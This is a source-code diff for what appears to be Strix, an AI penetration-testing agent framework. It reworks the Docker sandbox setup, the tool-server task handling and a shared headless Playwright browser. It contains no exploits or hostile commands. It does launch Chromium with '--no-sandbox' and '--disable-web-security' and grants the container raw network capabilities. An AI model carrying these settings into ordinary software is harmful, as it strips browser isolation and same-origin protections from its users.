return future.result(timeout=timeout)
except FuturesTimeoutError:
logger.exception(f"exec_run timed out after {timeout}s: {cmd[:100]}...")
raise SandboxInitializationError(
"Container command timed out",
f"Command timed out after {timeout} seconds. "
"Docker may be overloaded or unresponsive. "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
) from None
def _get_scan_id(self, agent_id: str) -> str:
try:
from strix.telemetry.tracer import get_global_tracer
@@ -84,129 +50,118 @@ class DockerRuntime(AbstractRuntime):
tracer = get_global_tracer()
if tracer and tracer.scan_config:
return str(tracer.scan_config.get("scan_id", "default-scan"))
except ImportError:
logger.debug("Failed to import tracer, using fallback scan ID")
except AttributeError:
logger.debug("Tracer missing scan_config, using fallback scan ID")
except (ImportError, AttributeError):
pass
return f"scan-{agent_id.split('-')[0]}"
def _verify_image_available(self, image_name: str, max_retries: int = 3) -> None:
def _validate_image(image: docker.models.images.Image) -> None:
if not image.id or not image.attrs:
raise ImageNotFound(f"Image {image_name} metadata incomplete")
for attempt in range(max_retries):
try:
image = self.client.images.get(image_name)
_validate_image(image)
except ImageNotFound:
if not image.id or not image.attrs:
raise ImageNotFound(f"Image {image_name} metadata incomplete") # noqa: TRY301
except (ImageNotFound, DockerException):
if attempt == max_retries - 1:
logger.exception(f"Image {image_name} not found after {max_retries} attempts")
raise
logger.warning(f"Image {image_name} not ready, attempt {attempt + 1}/{max_retries}")
time.sleep(2**attempt)
except DockerException:
if attempt == max_retries - 1:
logger.exception(f"Failed to verify image {image_name}")
raise
logger.warning(f"Docker error verifying image, attempt {attempt + 1}/{max_retries}")
time.sleep(2**attempt)
else:
logger.debug(f"Image {image_name} verified as available")
return
def _create_container_with_retry(self, scan_id: str, max_retries: int = 3) -> Container:
last_exception = None
def _recover_container_state(self, container: Container) -> None:
for env_var in container.attrs["Config"]["Env"]:
if env_var.startswith("TOOL_SERVER_TOKEN="):
self._tool_server_token = env_var.split("=", 1)[1]
break
port_bindings = container.attrs.get("NetworkSettings", {}).get("Ports", {})
port_key = f"{CONTAINER_TOOL_SERVER_PORT}/tcp"
if port_bindings.get(port_key):
self._tool_server_port = int(port_bindings[port_key][0]["HostPort"])
def _wait_for_tool_server(self, max_retries: int = 30, timeout: int = 5) -> None:
host = self._resolve_docker_host()
health_url = f"http://{host}:{self._tool_server_port}/health"
time.sleep(5)
for attempt in range(max_retries):
try:
with httpx.Client(trust_env=False, timeout=timeout) as client:
response = client.get(health_url)
if response.status_code == 200:
data = response.json()
if data.get("status") == "healthy":
return
except (httpx.ConnectError, httpx.TimeoutException, httpx.RequestError):
pass
time.sleep(min(2**attempt * 0.5, 5))
raise SandboxInitializationError(
"Tool server failed to start",
"Container initialization timed out. Please try again.",
)
def _create_container(self, scan_id: str, max_retries: int = 2) -> Container:
container_name = f"strix-scan-{scan_id}"
image_name = Config.get("strix_image")
if not image_name:
raise ValueError("STRIX_IMAGE must be configured")
for attempt in range(max_retries):
self._verify_image_available(image_name)
last_error: Exception | None = None
for attempt in range(max_retries + 1):
try:
self._verify_image_available(image_name)
try:
existing_container = self.client.containers.get(container_name)
logger.warning(f"Container {container_name} already exists, removing it")
with contextlib.suppress(NotFound):
existing = self.client.containers.get(container_name)
with contextlib.suppress(Exception):
existing_container.stop(timeout=5)
existing_container.remove(force=True)
existing.stop(timeout=5)
existing.remove(force=True)
time.sleep(1)
except NotFound:
pass
except DockerException as e:
logger.warning(f"Error checking/removing existing container: {e}")
caido_port = self._find_available_port()
tool_server_port = self._find_available_port()
tool_server_token = self._generate_sandbox_token()
self._tool_server_port = tool_server_port
self._tool_server_token = tool_server_token
self._tool_server_port = self._find_available_port()
self._tool_server_token = secrets.token_urlsafe(32)
execution_timeout = Config.get("strix_sandbox_execution_timeout") or "120"
container = self.client.containers.run(
image_name,
command="sleep infinity",
detach=True,
name=container_name,
hostname=f"strix-scan-{scan_id}",
ports={
f"{caido_port}/tcp": caido_port,
f"{tool_server_port}/tcp": tool_server_port,
},
hostname=container_name,
ports={f"{CONTAINER_TOOL_SERVER_PORT}/tcp": self._tool_server_port},
cap_add=["NET_ADMIN", "NET_RAW"],
labels={"strix-scan-id": scan_id},
environment={
"PYTHONUNBUFFERED": "1",
"CAIDO_PORT": str(caido_port),
"TOOL_SERVER_PORT": str(tool_server_port),
"TOOL_SERVER_TOKEN": tool_server_token,
"TOOL_SERVER_PORT": str(CONTAINER_TOOL_SERVER_PORT),
"TOOL_SERVER_TOKEN": self._tool_server_token,
"STRIX_SANDBOX_EXECUTION_TIMEOUT": str(execution_timeout),
"HOST_GATEWAY": HOST_GATEWAY_HOSTNAME,
},
extra_hosts=self._get_extra_hosts(),
extra_hosts={HOST_GATEWAY_HOSTNAME: "host-gateway"},
tty=True,
)
self._scan_container = container
logger.info("Created container %s for scan %s", container.id, scan_id)
self._wait_for_tool_server()
self._initialize_container(
container, caido_port, tool_server_port, tool_server_token
)
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
last_exception = e
if attempt == max_retries - 1:
logger.exception(f"Failed to create container after {max_retries} attempts")
break
logger.warning(f"Container creation attempt {attempt + 1}/{max_retries} failed")
self._tool_server_port = None
self._tool_server_token = None
sleep_time = (2**attempt) + (0.1 * attempt)
time.sleep(sleep_time)
last_error = e
if attempt < max_retries:
self._tool_server_port = None
self._tool_server_token = None
time.sleep(2**attempt)
else:
return container
if isinstance(last_exception, RequestsConnectionError | RequestsTimeout):
raise SandboxInitializationError(
"Failed to create sandbox container",
f"Docker daemon unresponsive after {max_retries} attempts "
f"(timed out after {DOCKER_TIMEOUT}s). "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
) from last_exception
raise SandboxInitializationError(
"Failed to create sandbox container",
f"Container creation failed after {max_retries} attempts: {last_exception}. "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
) from last_exception
"Failed to create container",
f"Container creation failed after {max_retries + 1} attempts: {last_error}",
) from last_error
def _get_or_create_scan_container(self, scan_id: str) -> Container: # noqa: PLR0912
def _get_or_create_container(self, scan_id: str) -> Container:
container_name = f"strix-scan-{scan_id}"
if self._scan_container:
@@ -223,33 +178,14 @@ class DockerRuntime(AbstractRuntime):
container = self.client.containers.get(container_name)
container.reload()
if (
"strix-scan-id" not in container.labels
or container.labels["strix-scan-id"] != scan_id
):
logger.warning(
f"Container {container_name} exists but missing/wrong label, updating"
)
if container.status != "running":
logger.info(f"Starting existing container {container_name}")
container.start()
time.sleep(2)
self._scan_container = container
for env_var in container.attrs["Config"]["Env"]:
if env_var.startswith("TOOL_SERVER_PORT="):
self._tool_server_port = int(env_var.split("=")[1])
elif env_var.startswith("TOOL_SERVER_TOKEN="):
self._tool_server_token = env_var.split("=")[1]
logger.info(f"Reusing existing container {container_name}")
self._recover_container_state(container)
except NotFound:
pass
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
logger.warning(f"Failed to get container by name {container_name}: {e}")
else:
return container
@@ -262,101 +198,14 @@ class DockerRuntime(AbstractRuntime):
if container.status != "running":
container.start()
time.sleep(2)
self._scan_container = container
for env_var in container.attrs["Config"]["Env"]:
if env_var.startswith("TOOL_SERVER_PORT="):
self._tool_server_port = int(env_var.split("=")[1])
elif env_var.startswith("TOOL_SERVER_TOKEN="):
self._tool_server_token = env_var.split("=")[1]
logger.info(f"Found existing container by label for scan {scan_id}")
self._recover_container_state(container)
return container
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
logger.warning("Failed to find existing container by label for scan %s: %s", scan_id, e)
except DockerException:
pass
logger.info("Creating new Docker container for scan %s", scan_id)
return self._create_container_with_retry(scan_id)
def _initialize_container(
self, container: Container, caido_port: int, tool_server_port: int, tool_server_token: str
) -> None:
logger.info("Initializing Caido proxy on port %s", caido_port)
self._exec_run_with_timeout(
container,
f"bash -c 'export CAIDO_PORT={caido_port} && /usr/local/bin/docker-entrypoint.sh true'",
detach=False,
)
time.sleep(5)
result = self._exec_run_with_timeout(
container,
"bash -c 'source /etc/profile.d/proxy.sh && echo $CAIDO_API_TOKEN'",
user="pentester",
)
caido_token = result.output.decode().strip() if result.exit_code == 0 else ""
container.exec_run(
f"bash -c 'source /etc/profile.d/proxy.sh && cd /app && "
f"STRIX_SANDBOX_MODE=true CAIDO_API_TOKEN={caido_token} CAIDO_PORT={caido_port} "
f"poetry run python strix/runtime/tool_server.py --token {tool_server_token} "
f"--host 0.0.0.0 --port {tool_server_port} &'",
detach=True,
user="pentester",
)
time.sleep(2)
host = self._resolve_docker_host()
health_url = f"http://{host}:{tool_server_port}/health"
self._wait_for_tool_server_health(health_url)
def _wait_for_tool_server_health(
self,
health_url: str,
max_retries: int = TOOL_SERVER_HEALTH_RETRIES,
request_timeout: int = TOOL_SERVER_HEALTH_REQUEST_TIMEOUT,
) -> None:
import httpx
logger.info(f"Waiting for tool server health at {health_url}")
for attempt in range(max_retries):
try:
with httpx.Client(trust_env=False, timeout=request_timeout) as client:
response = client.get(health_url)
response.raise_for_status()
health_data = response.json()
if health_data.get("status") == "healthy":
logger.info(
f"Tool server is healthy after {attempt + 1} attempt(s): {health_data}"
)
return
logger.warning(f"Tool server returned unexpected status: {health_data}")
except httpx.ConnectError:
logger.debug(
f"Tool server not ready (attempt {attempt + 1}/{max_retries}): "
f"Connection refused"
)
except httpx.TimeoutException:
logger.debug(
f"Tool server not ready (attempt {attempt + 1}/{max_retries}): "
f"Request timed out"
)
except (httpx.RequestError, httpx.HTTPStatusError) as e:
logger.debug(f"Tool server not ready (attempt {attempt + 1}/{max_retries}): {e}")
sleep_time = min(2**attempt * 0.5, 5)
time.sleep(sleep_time)
raise SandboxInitializationError(
"Tool server failed to start",
"Please ensure Docker Desktop is installed and running, and try running strix again.",
)
return self._create_container(scan_id)
def _copy_local_directory_to_container(
self, container: Container, local_path: str, target_name: str | None = None
@@ -367,17 +216,8 @@ class DockerRuntime(AbstractRuntime):
try:
local_path_obj = Path(local_path).resolve()
if not local_path_obj.exists() or not local_path_obj.is_dir():
logger.warning(f"Local path does not exist or is not directory: {local_path_obj}")
return
if target_name:
logger.info(
f"Copying local directory {local_path_obj} to container at "
f"/workspace/{target_name}"
)
else:
logger.info(f"Copying local directory {local_path_obj} to container")
tar_buffer = BytesIO()
with tarfile.open(fileobj=tar_buffer, mode="w") as tar:
for item in local_path_obj.rglob("*"):
@@ -388,16 +228,12 @@ class DockerRuntime(AbstractRuntime):
tar_buffer.seek(0)
container.put_archive("/workspace", tar_buffer.getvalue())
container.exec_run(
"chown -R pentester:pentester /workspace && chmod -R 755 /workspace",
user="root",
)
logger.info("Successfully copied local directory to /workspace")
except (OSError, DockerException):
logger.exception("Failed to copy local directory to container")
pass
async def create_sandbox(
self,
@@ -406,7 +242,7 @@ class DockerRuntime(AbstractRuntime):
local_sources: list[dict[str, str]] | None = None,
) -> SandboxInfo:
scan_id = self._get_scan_id(agent_id)
container = self._get_or_create_scan_container(scan_id)
container = self._get_or_create_container(scan_id)
source_copied_key = f"_source_copied_{scan_id}"
if local_sources and not hasattr(self, source_copied_key):
@@ -414,40 +250,33 @@ class DockerRuntime(AbstractRuntime):
source_path = source.get("source_path")
if not source_path:
continue
target_name = source.get("workspace_subdir")
if not target_name:
target_name = Path(source_path).name or f"target_{index}"
target_name = (
source.get("workspace_subdir") or Path(source_path).name or f"target_{index}"
)
self._copy_local_directory_to_container(container, source_path, target_name)
setattr(self, source_copied_key, True)
container_id = container.id
if container_id is None:
if container.id is None:
raise RuntimeError("Docker container ID is unexpectedly None")
token = existing_token if existing_token is not None else self._tool_server_token
token = existing_token or self._tool_server_token
if self._tool_server_port is None or token is None:
raise RuntimeError("Tool server not initialized or no token available")
raise RuntimeError("Tool server not initialized")
api_url = await self.get_sandbox_url(container_id, self._tool_server_port)
host = self._resolve_docker_host()
api_url = f"http://{host}:{self._tool_server_port}"
await self._register_agent_with_tool_server(api_url, agent_id, token)
await self._register_agent(api_url, agent_id, token)
return {
"workspace_id": container_id,
"workspace_id": container.id,
"api_url": api_url,
"auth_token": token,
"tool_server_port": self._tool_server_port,
"agent_id": agent_id,
}
async def _register_agent_with_tool_server(
self, api_url: str, agent_id: str, token: str
) -> None:
import httpx
async def _register_agent(self, api_url: str, agent_id: str, token: str) -> None:
try:
async with httpx.AsyncClient(trust_env=False) as client:
response = await client.post(
@@ -457,54 +286,33 @@ class DockerRuntime(AbstractRuntime):
timeout=30,
)
response.raise_for_status()
logger.info(f"Registered agent {agent_id} with tool server")
except (httpx.RequestError, httpx.HTTPStatusError) as e:
logger.warning(f"Failed to register agent {agent_id}: {e}")
except httpx.RequestError:
pass
async def get_sandbox_url(self, container_id: str, port: int) -> str:
try:
container = self.client.containers.get(container_id)
container.reload()
host = self._resolve_docker_host()
self.client.containers.get(container_id)
return f"http://{self._resolve_docker_host()}:{port}"
except NotFound:
raise ValueError(f"Container {container_id} not found.") from None
except DockerException as e:
raise RuntimeError(f"Failed to get container URL for {container_id}: {e}") from e
else:
return f"http://{host}:{port}"
def _resolve_docker_host(self) -> str:
docker_host = os.getenv("DOCKER_HOST", "")
if not docker_host:
return "127.0.0.1"
from urllib.parse import urlparse
parsed = urlparse(docker_host)
if parsed.scheme in ("tcp", "http", "https") and parsed.hostname:
return parsed.hostname
if docker_host:
from urllib.parse import urlparse
parsed = urlparse(docker_host)
if parsed.scheme in ("tcp", "http", "https") and parsed.hostname:
return parsed.hostname
return "127.0.0.1"
def _get_extra_hosts(self) -> dict[str, str]:
return {HOST_GATEWAY_HOSTNAME: "host-gateway"}
async def destroy_sandbox(self, container_id: str) -> None:
logger.info("Destroying scan container %s", container_id)
try:
container = self.client.containers.get(container_id)
container.stop()
container.remove()
logger.info("Successfully destroyed container %s", container_id)
self._scan_container = None
self._tool_server_port = None
self._tool_server_token = None
except NotFound:
logger.warning("Container %s not found for destruction.", container_id)
except DockerException as e:
logger.warning("Failed to destroy container %s: %s", container_id, e)
except (NotFound, DockerException):
pass

View File

@@ -2,11 +2,9 @@ from __future__ import annotations
import argparse
import asyncio
import logging
import os
import signal
import sys
from multiprocessing import Process, Queue
from typing import Any
import uvicorn
@@ -23,17 +21,22 @@ parser = argparse.ArgumentParser(description="Start Strix tool server")
parser.add_argument("--token", required=True, help="Authentication token")
parser.add_argument("--host", default="0.0.0.0", help="Host to bind to") # nosec
parser.add_argument("--port", type=int, required=True, help="Port to bind to")
parser.add_argument(
"--timeout",
type=int,
default=120,
help="Hard timeout in seconds for each request execution (default: 120)",
)
args = parser.parse_args()
EXPECTED_TOKEN = args.token
REQUEST_TIMEOUT = args.timeout
app = FastAPI()
security = HTTPBearer()
security_dependency = Depends(security)
agent_processes: dict[str, dict[str, Any]] = {}
agent_queues: dict[str, dict[str, Queue[Any]]] = {}
agent_tasks: dict[str, asyncio.Task[Any]] = {}
def verify_token(credentials: HTTPAuthorizationCredentials) -> str:
@@ -65,60 +68,19 @@ class ToolExecutionResponse(BaseModel):
error: str | None = None
def agent_worker(_agent_id: str, request_queue: Queue[Any], response_queue: Queue[Any]) -> None:
null_handler = logging.NullHandler()
root_logger = logging.getLogger()
root_logger.handlers = [null_handler]
root_logger.setLevel(logging.CRITICAL)
from strix.tools.argument_parser import ArgumentConversionError, convert_arguments
async def _run_tool(agent_id: str, tool_name: str, kwargs: dict[str, Any]) -> Any:
from strix.tools.argument_parser import convert_arguments
from strix.tools.context import set_current_agent_id
from strix.tools.registry import get_tool_by_name
while True:
try:
request = request_queue.get()
set_current_agent_id(agent_id)
if request is None:
break
tool_func = get_tool_by_name(tool_name)
if not tool_func:
raise ValueError(f"Tool '{tool_name}' not found")
tool_name = request["tool_name"]
kwargs = request["kwargs"]
try:
tool_func = get_tool_by_name(tool_name)
if not tool_func:
response_queue.put({"error": f"Tool '{tool_name}' not found"})
continue
converted_kwargs = convert_arguments(tool_func, kwargs)
result = tool_func(**converted_kwargs)
response_queue.put({"result": result})
except (ArgumentConversionError, ValidationError) as e:
response_queue.put({"error": f"Invalid arguments: {e}"})
except (RuntimeError, ValueError, ImportError) as e:
response_queue.put({"error": f"Tool execution error: {e}"})
except (RuntimeError, ValueError, ImportError) as e:
response_queue.put({"error": f"Worker error: {e}"})
def ensure_agent_process(agent_id: str) -> tuple[Queue[Any], Queue[Any]]:
if agent_id not in agent_processes:
request_queue: Queue[Any] = Queue()
response_queue: Queue[Any] = Queue()
process = Process(
target=agent_worker, args=(agent_id, request_queue, response_queue), daemon=True
)
process.start()
agent_processes[agent_id] = {"process": process, "pid": process.pid}
agent_queues[agent_id] = {"request": request_queue, "response": response_queue}
return agent_queues[agent_id]["request"], agent_queues[agent_id]["response"]
converted_kwargs = convert_arguments(tool_func, kwargs)
return await asyncio.to_thread(tool_func, **converted_kwargs)
@app.post("/execute", response_model=ToolExecutionResponse)
@@ -127,20 +89,42 @@ async def execute_tool(
) -> ToolExecutionResponse:
verify_token(credentials)
request_queue, response_queue = ensure_agent_process(request.agent_id)
agent_id = request.agent_id
request_queue.put({"tool_name": request.tool_name, "kwargs": request.kwargs})
if agent_id in agent_tasks:
old_task = agent_tasks[agent_id]
if not old_task.done():
old_task.cancel()
task = asyncio.create_task(
asyncio.wait_for(
_run_tool(agent_id, request.tool_name, request.kwargs), timeout=REQUEST_TIMEOUT
)
)
agent_tasks[agent_id] = task
try:
loop = asyncio.get_event_loop()
response = await loop.run_in_executor(None, response_queue.get)
result = await task
return ToolExecutionResponse(result=result)
if "error" in response:
return ToolExecutionResponse(error=response["error"])
return ToolExecutionResponse(result=response.get("result"))
except asyncio.CancelledError:
return ToolExecutionResponse(error="Cancelled by newer request")
except (RuntimeError, ValueError, OSError) as e:
return ToolExecutionResponse(error=f"Worker error: {e}")
except TimeoutError:
return ToolExecutionResponse(error=f"Tool timed out after {REQUEST_TIMEOUT}s")
except ValidationError as e:
return ToolExecutionResponse(error=f"Invalid arguments: {e}")
except (ValueError, RuntimeError, ImportError) as e:
return ToolExecutionResponse(error=f"Tool execution error: {e}")
except Exception as e: # noqa: BLE001
return ToolExecutionResponse(error=f"Unexpected error: {e}")
finally:
if agent_tasks.get(agent_id) is task:
del agent_tasks[agent_id]
@app.post("/register_agent")
@@ -148,8 +132,6 @@ async def register_agent(
agent_id: str, credentials: HTTPAuthorizationCredentials = security_dependency
) -> dict[str, str]:
verify_token(credentials)
ensure_agent_process(agent_id)
return {"status": "registered", "agent_id": agent_id}
@@ -160,35 +142,16 @@ async def health_check() -> dict[str, Any]:
"sandbox_mode": str(SANDBOX_MODE),
"environment": "sandbox" if SANDBOX_MODE else "main",
"auth_configured": "true" if EXPECTED_TOKEN else "false",
"active_agents": len(agent_processes),
"agents": list(agent_processes.keys()),
"active_agents": len(agent_tasks),
"agents": list(agent_tasks.keys()),
}
def cleanup_all_agents() -> None:
for agent_id in list(agent_processes.keys()):
try:
agent_queues[agent_id]["request"].put(None)
process = agent_processes[agent_id]["process"]
process.join(timeout=1)
if process.is_alive():
process.terminate()
process.join(timeout=1)
if process.is_alive():
process.kill()
except (BrokenPipeError, EOFError, OSError):
pass
except (RuntimeError, ValueError) as e:
logging.getLogger(__name__).debug(f"Error during agent cleanup: {e}")
def signal_handler(_signum: int, _frame: Any) -> None:
signal.signal(signal.SIGPIPE, signal.SIG_IGN) if hasattr(signal, "SIGPIPE") else None
cleanup_all_agents()
if hasattr(signal, "SIGPIPE"):
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
for task in agent_tasks.values():
task.cancel()
sys.exit(0)
@@ -199,7 +162,4 @@ signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
if __name__ == "__main__":
try:
uvicorn.run(app, host=args.host, port=args.port, log_level="info")
finally:
cleanup_all_agents()
uvicorn.run(app, host=args.host, port=args.port, log_level="info")

View File

@@ -1,11 +1,14 @@
from pathlib import Path
from jinja2 import Environment
from strix.utils.resource_paths import get_strix_resource_path
def get_available_skills() -> dict[str, list[str]]:
skills_dir = Path(__file__).parent
available_skills = {}
skills_dir = get_strix_resource_path("skills")
available_skills: dict[str, list[str]] = {}
if not skills_dir.exists():
return available_skills
for category_dir in skills_dir.iterdir():
if category_dir.is_dir() and not category_dir.name.startswith("__"):
@@ -72,7 +75,7 @@ def load_skills(skill_names: list[str], jinja_env: Environment) -> dict[str, str
logger = logging.getLogger(__name__)
skill_content = {}
skills_dir = Path(__file__).parent
skills_dir = get_strix_resource_path("skills")
available_skills = get_available_skills()

View File

@@ -430,10 +430,8 @@ class Tracer:
"input_tokens": 0,
"output_tokens": 0,
"cached_tokens": 0,
"cache_creation_tokens": 0,
"cost": 0.0,
"requests": 0,
"failed_requests": 0,
}
for agent_instance in _agent_instances.values():
@@ -442,10 +440,8 @@ class Tracer:
total_stats["input_tokens"] += agent_stats.input_tokens
total_stats["output_tokens"] += agent_stats.output_tokens
total_stats["cached_tokens"] += agent_stats.cached_tokens
total_stats["cache_creation_tokens"] += agent_stats.cache_creation_tokens
total_stats["cost"] += agent_stats.cost
total_stats["requests"] += agent_stats.requests
total_stats["failed_requests"] += agent_stats.failed_requests
total_stats["cost"] = round(total_stats["cost"], 4)

View File

@@ -1,4 +1,3 @@
<?xml version="1.0" ?>
<tools>
<tool name="browser_action">
<description>Perform browser actions using a Playwright-controlled browser with multiple tabs.
@@ -92,6 +91,12 @@
code normally. It can be single line or multi-line.
13. For form filling, click on the field first, then use 'type' to enter text.
14. The browser runs in headless mode using Chrome engine for security and performance.
15. RESOURCE MANAGEMENT:
- ALWAYS close tabs you no longer need using 'close_tab' action.
- ALWAYS close the browser with 'close' action when you have completely finished
all browser-related tasks. Do not leave the browser running if you're done with it.
- If you opened multiple tabs, close them as soon as you've extracted the needed
information from each one.
</notes>
<examples>
# Launch browser at URL (creates tab_1)

View File

@@ -1,5 +1,6 @@
import asyncio
import base64
import contextlib
import logging
import threading
from pathlib import Path
@@ -17,13 +18,82 @@ MAX_CONSOLE_LOGS_COUNT = 200
MAX_JS_RESULT_LENGTH = 5_000
class _BrowserState:
"""Singleton state for the shared browser instance."""
lock = threading.Lock()
event_loop: asyncio.AbstractEventLoop | None = None
event_loop_thread: threading.Thread | None = None
playwright: Playwright | None = None
browser: Browser | None = None
_state = _BrowserState()
def _ensure_event_loop() -> None:
if _state.event_loop is not None:
return
def run_loop() -> None:
_state.event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(_state.event_loop)
_state.event_loop.run_forever()
_state.event_loop_thread = threading.Thread(target=run_loop, daemon=True)
_state.event_loop_thread.start()
while _state.event_loop is None:
threading.Event().wait(0.01)
async def _create_browser() -> Browser:
if _state.browser is not None and _state.browser.is_connected():
return _state.browser
if _state.browser is not None:
with contextlib.suppress(Exception):
await _state.browser.close()
_state.browser = None
if _state.playwright is not None:
with contextlib.suppress(Exception):
await _state.playwright.stop()
_state.playwright = None
_state.playwright = await async_playwright().start()
_state.browser = await _state.playwright.chromium.launch(
headless=True,
args=[
"--no-sandbox",
"--disable-dev-shm-usage",
"--disable-gpu",
"--disable-web-security",
],
)
return _state.browser
def _get_browser() -> tuple[asyncio.AbstractEventLoop, Browser]:
with _state.lock:
_ensure_event_loop()
assert _state.event_loop is not None
if _state.browser is None or not _state.browser.is_connected():
future = asyncio.run_coroutine_threadsafe(_create_browser(), _state.event_loop)
future.result(timeout=30)
assert _state.browser is not None
return _state.event_loop, _state.browser
class BrowserInstance:
def __init__(self) -> None:
self.is_running = True
self._execution_lock = threading.Lock()
self.playwright: Playwright | None = None
self.browser: Browser | None = None
self._loop: asyncio.AbstractEventLoop | None = None
self._browser: Browser | None = None
self.context: BrowserContext | None = None
self.pages: dict[str, Page] = {}
self.current_page_id: str | None = None
@@ -31,23 +101,6 @@ class BrowserInstance:
self.console_logs: dict[str, list[dict[str, Any]]] = {}
self._loop: asyncio.AbstractEventLoop | None = None
self._loop_thread: threading.Thread | None = None
self._start_event_loop()
def _start_event_loop(self) -> None:
def run_loop() -> None:
self._loop = asyncio.new_event_loop()
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
self._loop_thread = threading.Thread(target=run_loop, daemon=True)
self._loop_thread.start()
while self._loop is None:
threading.Event().wait(0.01)
def _run_async(self, coro: Any) -> dict[str, Any]:
if not self._loop or not self.is_running:
raise RuntimeError("Browser instance is not running")
@@ -77,21 +130,10 @@ class BrowserInstance:
page.on("console", handle_console)
async def _launch_browser(self, url: str | None = None) -> dict[str, Any]:
self.playwright = await async_playwright().start()
async def _create_context(self, url: str | None = None) -> dict[str, Any]:
assert self._browser is not None
self.browser = await self.playwright.chromium.launch(
headless=True,
args=[
"--no-sandbox",
"--disable-dev-shm-usage",
"--disable-gpu",
"--disable-web-security",
"--disable-features=VizDisplayCompositor",
],
)
self.context = await self.browser.new_context(
self.context = await self._browser.new_context(
viewport={"width": 1280, "height": 720},
user_agent=(
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
@@ -148,10 +190,11 @@ class BrowserInstance:
def launch(self, url: str | None = None) -> dict[str, Any]:
with self._execution_lock:
if self.browser is not None:
if self.context is not None:
raise ValueError("Browser is already launched")
return self._run_async(self._launch_browser(url))
self._loop, self._browser = _get_browser()
return self._run_async(self._create_context(url))
def goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
with self._execution_lock:
@@ -512,22 +555,27 @@ class BrowserInstance:
def close(self) -> None:
with self._execution_lock:
self.is_running = False
if self._loop:
asyncio.run_coroutine_threadsafe(self._close_browser(), self._loop)
if self._loop and self.context:
future = asyncio.run_coroutine_threadsafe(self._close_context(), self._loop)
with contextlib.suppress(Exception):
future.result(timeout=5)
self._loop.call_soon_threadsafe(self._loop.stop)
self.pages.clear()
self.console_logs.clear()
self.current_page_id = None
self.context = None
if self._loop_thread:
self._loop_thread.join(timeout=5)
async def _close_browser(self) -> None:
async def _close_context(self) -> None:
try:
if self.browser:
await self.browser.close()
if self.playwright:
await self.playwright.stop()
if self.context:
await self.context.close()
except (OSError, RuntimeError) as e:
logger.warning(f"Error closing browser: {e}")
logger.warning(f"Error closing context: {e}")
def is_alive(self) -> bool:
return self.is_running and self.browser is not None and self.browser.is_connected()
return (
self.is_running
and self.context is not None
and self._browser is not None
and self._browser.is_connected()
)

View File

@@ -1,43 +1,56 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from strix.tools.context import get_current_agent_id
from .browser_instance import BrowserInstance
class BrowserTabManager:
def __init__(self) -> None:
self.browser_instance: BrowserInstance | None = None
self._browsers_by_agent: dict[str, BrowserInstance] = {}
self._lock = threading.Lock()
self._register_cleanup_handlers()
def _get_agent_browser(self) -> BrowserInstance | None:
agent_id = get_current_agent_id()
with self._lock:
return self._browsers_by_agent.get(agent_id)
def _set_agent_browser(self, browser: BrowserInstance | None) -> None:
agent_id = get_current_agent_id()
with self._lock:
if browser is None:
self._browsers_by_agent.pop(agent_id, None)
else:
self._browsers_by_agent[agent_id] = browser
def launch_browser(self, url: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is not None:
agent_id = get_current_agent_id()
if agent_id in self._browsers_by_agent:
raise ValueError("Browser is already launched")
try:
self.browser_instance = BrowserInstance()
result = self.browser_instance.launch(url)
browser = BrowserInstance()
result = browser.launch(url)
self._browsers_by_agent[agent_id] = browser
result["message"] = "Browser launched successfully"
except (OSError, ValueError, RuntimeError) as e:
if self.browser_instance:
self.browser_instance = None
raise RuntimeError(f"Failed to launch browser: {e}") from e
else:
return result
def goto_url(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.goto(url, tab_id)
result = browser.goto(url, tab_id)
result["message"] = f"Navigated to {url}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to navigate to URL: {e}") from e
@@ -45,12 +58,12 @@ class BrowserTabManager:
return result
def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.click(coordinate, tab_id)
result = browser.click(coordinate, tab_id)
result["message"] = f"Clicked at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to click: {e}") from e
@@ -58,12 +71,12 @@ class BrowserTabManager:
return result
def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.type_text(text, tab_id)
result = browser.type_text(text, tab_id)
result["message"] = f"Typed text: {text[:50]}{'...' if len(text) > 50 else ''}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to type text: {e}") from e
@@ -71,12 +84,12 @@ class BrowserTabManager:
return result
def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.scroll(direction, tab_id)
result = browser.scroll(direction, tab_id)
result["message"] = f"Scrolled {direction}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to scroll: {e}") from e
@@ -84,12 +97,12 @@ class BrowserTabManager:
return result
def back(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.back(tab_id)
result = browser.back(tab_id)
result["message"] = "Navigated back"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to go back: {e}") from e
